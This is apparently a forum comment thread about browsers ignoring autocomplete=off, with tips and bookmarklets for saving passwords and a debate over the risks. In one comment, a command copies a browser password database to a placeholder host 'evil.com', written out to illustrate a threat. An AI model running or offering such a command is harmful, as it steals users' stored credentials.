The war against autocomplete=off (2013)
blog.0xbadc0de.be
blog.0xbadc0de.be
1. Go to about:config
2. Right-click anywhere, New -> Boolean:
signon.overrideAutocomplete
Value: true
More info: https://bugzilla.mozilla.org/show_bug.cgi?id=425145
EDIT: Based on the milestone set on that issue, this setting requires Firefox 29. Another workaround is this bookmarklet: https://www.squarefree.com/bookmarklets/forms.html#remember_... referenced from comment https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16
Thankfully, safari on both iOS and OS X has a toggle to ignore autocomplete=off, which I take advantage of liberally.
Ironic, as it seems to be banks that are most often guilty of this.
Come on, I only forgot my password and want to set it to what I think it should be! I didn't get hacked! Just let me live my life in peace!
These have appeared in Ubuntu.
oh man. disabling paste is the worst, because it breaks keypassx. (Apple did this last I checked!)
turbotax did that as well last year, this year they made it sane again. Luckily there's a firefox about:config setting you can do to not let websites hijack / block your clipboard events.
This line will make ctrl-alt-v type your clipboard:
^+v::SendRaw %clipboard%
(blogpost writer here)
Yes I'm lazy. But my laptop is encrypted and goes back to the login screen after 2 minutes of inactivity. To me autocomplete=off is just annoying and doesn't add any security.
javascript:(function(){var%20c=0;function%20R(w){try{var%20a,df,dfe,i,j,x,y,r=1;df=w.document.forms;for(i=0;x=df[i];++i){dfe=x.elements;if(a=x.onsubmit){a=""}if(a=x.attributes["autocomplete"]){if(a.value=="on"){c++}a.value="on"}for(j=0;y=dfe[j];++j){if(a=y.attributes["autocomplete"]){if(a.value=="on"){c++}a.value="on"}}}}catch(E){r=0}return%20r}R(self);var%20i,x;for(i=0;x=frames[i];++i)R(x);if(c){alert("Found:%20"+c)}})();
I dot so worked up over this kind of nonsense one day that I wrote a firefox addon to turn autocomplete on. https://addons.mozilla.org/En-us/firefox/addon/autocompletea...
Otherwise I can see the benefit of ignoring the setting, perhaps, but we need consistent default behavior (chance would be a fine thing!). I don't want to be telling my customers that they should switch off autocomplete as a user shouldn't need to configure a browser to use a website!
So the problem really is that the browsers pushed insecure features out to the masses, and many people adopted them. The number of people in the general population who use a password manager is low (obviously it is high here on HN). So think of the autocomplete=off flag as a flag to make sure you are using a competent password manager, one that recognizes the problem and then overrides the flag. Sounds like Safari and IE 11 are already doing that, so hopefully they fixed the problems of the early password managers.
And when your machine is compromised or otherwise controlled by an untrustworthy third party, you lost anyway.
In other words, in practice there is an actual tradeoff between the two.
So, for most people you trade a near meaningless threat to fight a major one which tends to be a net win.
Or, in its absence, take a look at the stickynotes and see all the password the person is using for everything. Or guess that the user's password is 'password' or something stupid like 'secret'
I mean I agree that it's a bad call for public computers to have it enabled by default. But among people's likely options I'd far sooner have them using even a bad password manager than what I perceive them to be likely to do in its absence - and from that perspective pretty much anything that lowers the likely adoption of password managers seems like a bad call.
I don't think that the larger population are going to find that FF's password manager doesn't work with a site and go running off to download KeePass or Lastpass or something like that. I think they're just going to shrug and type in 'password', (or some other dictionary word and a couple of numbers on the end - but in any case something re-used and simple,) for that site.
As you said, in FF, (and in Chrome), a few clicks and anyone could look and an unattended computer and see all the stored passwords. As they pointed out, an unlocked unintended computer can pretty much be owned by anyone who wants to own it. You've given them access to your computer. They can open a shell and start running apps. They can exploit any bug in the OS or other app. They can copy files to a USB stick or across the net. On top of that, your password manager (or FF or Chrome) will let them log into your mail, your bank, your facebook, whatever services you've saved passwords for even without knowing your password.
The point is
(1) don't leave your computer unlocked and unattended. Put a password on it, when you walk away from the computer lock the computer (start the screensaver or whatever that makes it required you to use a password to get back in)
(2) don't ever let someone use your computer logged in as you. If you hand someone your computer to use login as guest then hand it to them.
If you're like me you'll probably reject these suggestions. I thought "I don't want to be bother to lock and unlock my computer all the time" and I thought "It's stupid to expect me to put my computer in guest mode anytime I let someone else use it."
But, after I calmed down and thought about it I realized they are right. If someone wants your passwords or other data and you hand them an unlocked machine they are going to get them. How FF or Chrome or Password managers store passwords has nothing to do with that.
Well, why didn't the password managers in several browsers do that by default?
Also, not all attacks are about "pwning" a computer. If an attacker can gather data, such as competitive corporate data, without being detected, that is much better in many ways. In practical terms, it would also be much faster (and unntraceable) to look at 2-3 key passwords in someone's open Firefox than to infect their computer with malware.
Now, reducing the technical knowledge required from "opening a shell and running apps" to "click here to see all passwords in seconds" greatly reduces the technical knowledge required and so greatly increases the risk you're exposed to.
Open terminal type
scp .somebrowser/password.db user@evil.com:
Takes no more time than writing down passwords like nfie28447ncjf;$/$38342. Probably less if there's more than one password
No, what happens is that autocomplete=off flag is a flag to make sure you are using your brain as a password manager, which experience has shown to be a terrible idea.
Instead of a browser password manager that can help make your passwords unique per site and comprised of random characters, users are forced to use passwords from their head, likely sharing them between sites. Someone coming to your unattended computer isn't nearly the threat of you using a simple and short password across every site you visit, including the sites that end up with a stolen passwords database or have a moronic password recovery option.
Or maybe you could rephrase why you think browsers are terrible password managers? I’m quite fond of Opera’s Wand.
And in any case, for the cases where this setting is effective, it doesn't break password managers--just set your password manager to not fill the fields, but use copy and paste for the password.
[Edit - spelling]
One solution to this problem (or at least one way to severely mitigate it) is to use a base word that you tweak with a simple algorithm based on the first letter, last letter, number of letters in the domain, etc. Of course some websites have mutually exclusive requirements, so this doesn't work for all sites, but I've been doing this for so many years now that while I have muscle memory for frequently used sites, I can go to a site I haven't been to in years and have no memory of the actual characters in the password, but I apply my algorithm and voila, it works!
Recently I changed my big accounts (Google, Facebook, StackOverflow) to have a slightly different "base word" and the other accounts that I can afford to lose control of have stayed the same.
For insecure services that I use on mobile, public, etc computers, I do this.
Hrmmn... when did I last set this password?
My favorite extension.
Key is I guess not using browser stores.
Not letting the browser cache them is still dumb though.
https://addons.mozilla.org/en-US/firefox/addon/remember-pass...
It's heavenly.
Recently it started to no longer save my password, even with an autocomplete=on plugin installed that works on other sites. That was my catalyst for uninstalling Chrome altogether and moving to Firefox for everything.